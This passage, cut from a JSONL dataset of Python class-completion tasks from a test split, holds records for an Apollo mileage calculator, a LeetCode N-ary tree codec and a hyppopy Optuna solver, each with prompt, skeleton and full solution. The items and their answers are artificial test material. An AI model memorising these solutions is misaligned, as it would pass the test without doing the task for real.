Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\n self.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\n self.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]\n<|end_body_1|>\n", "revision_id": "105f7fd19220dc4c04be1e075b1a5d932eaa2f3f", "skeleton": "<|skeleton|>\nclass MileageCalculator:\n \"\"\"Calculate mileage\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n <|body_0|>\n\n def calculate(self, bag_file):\n \"\"\"Calculate mileage\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MileageCalculator:\n \"\"\"Calculate mileage\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.auto_mileage = 0.0\n self.manual_mileage = 0.0\n self.disengagements = 0\n\n def calculate(self, bag_file):\n \"\"\"Calculate mileage\"\"\"\n last_pos = None\n last_mode = 'Unknown'\n mileage = collections.defaultdict(lambda: 0.0)\n chassis = chassis_pb2.Chassis()\n localization = localization_pb2.LocalizationEstimate()\n reader = RecordReader(bag_file)\n for msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\n self.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\n self.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]\n", "source": "the_stack_v2_python_sparse", "source_path": "modules/tools/rosbag/stat_mileage.py", "source_repo": "lgsvl/apollo-5.0", "split": "test", "star_events_count": 86} {"blob_id": "162fd1e0c6bcf44241d4c11f077c73c1d1b1a905", "bodies": ["if root is None:\n return ''\ndata = []\ndeq = collections.deque([root])\nwhile deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\nreturn ','.join(data)", "if len(data) == 0:\n return None\ndata = data.split(',')\nroot = Node(int(data[0]), [])\nn = int(data[1])\ndeq = collections.deque([(root, n)])\ni = 2\nwhile deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\nreturn root"], "bodies_text": "<|body_start_0|>\n if root is None:\n return ''\n data = []\n deq = collections.deque([root])\n while deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\n return ','.join(data)\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n data = data.split(',')\n root = Node(int(data[0]), [])\n n = int(data[1])\n deq = collections.deque([(root, n)])\n i = 2\n while deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return ''\n data = []\n deq = collections.deque([root])\n while deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\n return ','.join(data)\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n data = data.split(',')\n root = Node(int(data[0]), [])\n n = int(data[1])\n deq = collections.deque([(root, n)])\n i = 2\n while deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000044", "length_bytes": 3144, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root: 'Node') -> str"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data: str) -> 'Node'"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return ''\n data = []\n deq = collections.deque([root])\n while deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\n return ','.join(data)\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n data = data.split(',')\n root = Node(int(data[0]), [])\n n = int(data[1])\n deq = collections.deque([(root, n)])\n i = 2\n while deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\n return root\n<|end_body_1|>\n", "revision_id": "6ff1941ff213a843013100ac7033e2d4f90fbd6a", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n if root is None:\n return ''\n data = []\n deq = collections.deque([root])\n while deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\n return ','.join(data)\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if len(data) == 0:\n return None\n data = data.split(',')\n root = Node(int(data[0]), [])\n n = int(data[1])\n deq = collections.deque([(root, n)])\n i = 2\n while deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "Leetcode 0428. Serialize and Deserialize N-ary Tree.py", "source_repo": "Chaoran-sjsu/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "931b328fbaf30efd4dc3ac2ffe55b64c5bb4c7a6", "bodies": ["HyppopySolver.__init__(self, project)\nself._searchspace = None\nself.candidates_list = list()", "self._add_member('max_iterations', int)\nself._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\nself._add_hyperparameter_signature(name='data', dtype=list)\nself._add_hyperparameter_signature(name='type', dtype=type)", "candidates_list = list()\nN = self.max_iterations\nfor n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\nreturn candidates_list\nN = self.max_iterations\nfor n in range(N):\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\nreturn candidates_list", "params = {}\nfor name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\nreturn self.loss_function(**params)", "LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\nself._searchspace = searchspace\ntry:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\nexcept Exception as e:\n LOG.error('internal error in bayes_opt maximize occured. {}'.format(e))\n raise BrokenPipeError('internal error in bayes_opt maximize occured. {}'.format(e))", "LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\nfor name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\nreturn hyperparameter"], "bodies_text": "<|body_start_0|>\n HyppopySolver.__init__(self, project)\n self._searchspace = None\n self.candidates_list = list()\n<|end_body_0|>\n\n<|body_start_1|>\n self._add_member('max_iterations', int)\n self._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\n self._add_hyperparameter_signature(name='data', dtype=list)\n self._add_hyperparameter_signature(name='type', dtype=type)\n<|end_body_1|>\n\n<|body_start_2|>\n candidates_list = list()\n N = self.max_iterations\n for n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n N = self.max_iterations\n for n in range(N):\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n<|end_body_2|>\n\n<|body_start_3|>\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n return self.loss_function(**params)\n<|end_body_3|>\n\n<|body_start_4|>\n LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\n self._searchspace = searchspace\n try:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\n except Exception as e:\n LOG.error('internal error in bayes_opt maximize occured. {}'.format(e))\n raise BrokenPipeError('internal error in bayes_opt maximize occured. {}'.format(e))\n<|end_body_4|>\n\n<|body_start_5|>\n LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\n for name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\n return hyperparameter\n<|end_body_5|>\n", "class_docstring": "", "class_name": "OptunaSolver", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OptunaSolver:\n\n def __init__(self, project=None):\n \"\"\"The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\"\"\"\n <|body_0|>\n\n def define_interface(self):\n \"\"\"This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.\"\"\"\n <|body_1|>\n\n def get_candidates(self, trial=None):\n \"\"\"This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\"\"\"\n <|body_2|>\n\n def trial_cache(self, trial):\n \"\"\"Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\"\"\"\n <|body_3|>\n\n def execute_solver(self, searchspace):\n \"\"\"This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space\"\"\"\n <|body_4|>\n\n def convert_searchspace(self, hyperparameter):\n \"\"\"This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n HyppopySolver.__init__(self, project)\n self._searchspace = None\n self.candidates_list = list()\n<|end_body_0|>\n\n<|body_start_1|>\n self._add_member('max_iterations', int)\n self._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\n self._add_hyperparameter_signature(name='data', dtype=list)\n self._add_hyperparameter_signature(name='type', dtype=type)\n<|end_body_1|>\n\n<|body_start_2|>\n candidates_list = list()\n N = self.max_iterations\n for n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n N = self.max_iterations\n for n in range(N):\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n<|end_body_2|>\n\n<|body_start_3|>\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n return self.loss_function(**params)\n<|end_body_3|>\n\n<|body_start_4|>\n LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\n self._searchspace = searchspace\n try:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\n except Exception as e:\n LOG.error('internal error in bayes_opt maximize occured. {}'.format(e))\n raise BrokenPipeError('internal error in bayes_opt maximize occured. {}'.format(e))\n<|end_body_4|>\n\n<|body_start_5|>\n LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\n for name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\n return hyperparameter\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000045", "length_bytes": 6091, "license_type": "no_license", "methods": [{"docstring": "The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None", "name": "__init__", "signature": "def __init__(self, project=None)"}, {"docstring": "This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.", "name": "define_interface", "signature": "def define_interface(self)"}, {"docstring": "This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space", "name": "get_candidates", "signature": "def get_candidates(self, trial=None)"}, {"docstring": "Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function", "name": "trial_cache", "signature": "def trial_cache(self, trial)"}, {"docstring": "This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space", "name": "execute_solver", "signature": "def execute_solver(self, searchspace)"}, {"docstring": "This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space", "name": "convert_searchspace", "signature": "def convert_searchspace(self, hyperparameter)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_002507", "prompt": "Implement the Python class `OptunaSolver` described below.\n\nClass description:\nImplement the OptunaSolver class.\n\nMethod signatures and docstrings:\n- def __init__(self, project=None): The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\n- def define_interface(self): This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.\n- def get_candidates(self, trial=None): This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\n- def trial_cache(self, trial): Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\n- def execute_solver(self, searchspace): This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space\n- def convert_searchspace(self, hyperparameter): This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space", "prompted_full_text": "Implement the Python class `OptunaSolver` described below.\n\nClass description:\nImplement the OptunaSolver class.\n\nMethod signatures and docstrings:\n- def __init__(self, project=None): The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\n- def define_interface(self): This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.\n- def get_candidates(self, trial=None): This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\n- def trial_cache(self, trial): Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\n- def execute_solver(self, searchspace): This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space\n- def convert_searchspace(self, hyperparameter): This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\n\n<|skeleton|>\nclass OptunaSolver:\n\n def __init__(self, project=None):\n \"\"\"The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\"\"\"\n <|body_0|>\n\n def define_interface(self):\n \"\"\"This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.\"\"\"\n <|body_1|>\n\n def get_candidates(self, trial=None):\n \"\"\"This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\"\"\"\n <|body_2|>\n\n def trial_cache(self, trial):\n \"\"\"Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\"\"\"\n <|body_3|>\n\n def execute_solver(self, searchspace):\n \"\"\"This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space\"\"\"\n <|body_4|>\n\n def convert_searchspace(self, hyperparameter):\n \"\"\"This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n HyppopySolver.__init__(self, project)\n self._searchspace = None\n self.candidates_list = list()\n<|end_body_0|>\n\n<|body_start_1|>\n self._add_member('max_iterations', int)\n self._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\n self._add_hyperparameter_signature(name='data', dtype=list)\n self._add_hyperparameter_signature(name='type', dtype=type)\n<|end_body_1|>\n\n<|body_start_2|>\n candidates_list = list()\n N = self.max_iterations\n for n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n N = self.max_iterations\n for n in range(N):\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n<|end_body_2|>\n\n<|body_start_3|>\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n return self.loss_function(**params)\n<|end_body_3|>\n\n<|body_start_4|>\n LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\n self._searchspace = searchspace\n try:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\n except Exception as e:\n LOG.error('internal error in bayes_opt maximize occured. {}'.format(e))\n raise BrokenPipeError('internal error in bayes_opt maximize occured. {}'.format(e))\n<|end_body_4|>\n\n<|body_start_5|>\n LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\n for name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n warnings.warn(msg)\n LOG.warning(msg)\n return hyperparameter\n<|end_body_5|>\n", "revision_id": "254adacd6164aceca27794611f57a7ab82e4dc29", "skeleton": "<|skeleton|>\nclass OptunaSolver:\n\n def __init__(self, project=None):\n \"\"\"The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\"\"\"\n <|body_0|>\n\n def define_interface(self):\n \"\"\"This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.\"\"\"\n <|body_1|>\n\n def get_candidates(self, trial=None):\n \"\"\"This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\"\"\"\n <|body_2|>\n\n def trial_cache(self, trial):\n \"\"\"Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\"\"\"\n <|body_3|>\n\n def execute_solver(self, searchspace):\n \"\"\"This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space\"\"\"\n <|body_4|>\n\n def convert_searchspace(self, hyperparameter):\n \"\"\"This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OptunaSolver:\n def __init__(self, project=None):\n \"\"\"The constructor accepts a HyppopyProject. :param project: [HyppopyProject] project instance, default=None\"\"\"\n HyppopySolver.__init__(self, project)\n self._searchspace = None\n self.candidates_list = list()\n\n def define_interface(self):\n \"\"\"This function is called when HyppopySolver.__init__ function finished. Child classes need to define their individual parameter here by calling the _add_member function for each class member variable need to be defined. Using _add_hyperparameter_signature the structure of a hyperparameter the solver expects must be defined. Both, members and hyperparameter signatures are later get checked, before executing the solver, ensuring settings passed fullfill solver needs.\"\"\"\n self._add_member('max_iterations', int)\n self._add_hyperparameter_signature(name='domain', dtype=str, options=['uniform', 'categorical'])\n self._add_hyperparameter_signature(name='data', dtype=list)\n self._add_hyperparameter_signature(name='type', dtype=type)\n\n def get_candidates(self, trial=None):\n \"\"\"This function converts the searchspace to a candidate_list that can then be used to distribute via MPI. :param searchspace: converted hyperparameter space\"\"\"\n candidates_list = list()\n N = self.max_iterations\n for n in range(N):\n print(n)\n from optuna import trial as trial_module\n trial_id = self.study._storage.create_new_trial_id(0)\n trial = trial_module.Trial(self.study, trial_id)\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n N = self.max_iterations\n for n in range(N):\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n candidates_list.append(CandidateDescriptor(**params))\n return candidates_list\n\n def trial_cache(self, trial):\n \"\"\"Optuna specific loss function wrapper :param trial: [Trial] instance :return: [function] loss function\"\"\"\n params = {}\n for name, param in self._searchspace.items():\n if param['domain'] == 'categorical':\n params[name] = trial.suggest_categorical(name, param['data'])\n else:\n params[name] = trial.suggest_uniform(name, param['data'][0], param['data'][1])\n return self.loss_function(**params)\n\n def execute_solver(self, searchspace):\n \"\"\"This function is called immediately after convert_searchspace and get the output of the latter as input. It's purpose is to call the solver libs main optimization function. :param searchspace: converted hyperparameter space\"\"\"\n LOG.debug('execute_solver using solution space:\\n\\n\\t{}\\n'.format(pformat(searchspace)))\n self._searchspace = searchspace\n try:\n study = optuna.create_study()\n study.optimize(self.trial_cache, n_trials=self.max_iterations)\n self.best = study.best_trial.params\n except Exception as e:\n LOG.error('internal error in bayes_opt maximize occured. {}'.format(e))\n raise BrokenPipeError('internal error in bayes_opt maximize occured. {}'.format(e))\n\n def convert_searchspace(self, hyperparameter):\n \"\"\"This function gets the unified hyppopy-like parameterspace description as input and, if necessary, should convert it into a solver lib specific format. The function is invoked when run is called and what it returns is passed as searchspace argument to the function execute_solver. :param hyperparameter: [dict] nested parameter description dict e.g. {'name': {'domain':'uniform', 'data':[0,1], 'type':'float'}, ...} :return: [object] converted hyperparameter space\"\"\"\n LOG.debug('convert input parameter\\n\\n\\t{}\\n'.format(pformat(hyperparameter)))\n for name, param in hyperparameter.items():\n if param['domain'] != 'categorical' and param['domain'] != 'uniform':\n msg = 'Warning: Optuna cannot handle {} domain. Only uniform and categorical domains are supported!'.format(param['domain'])\n 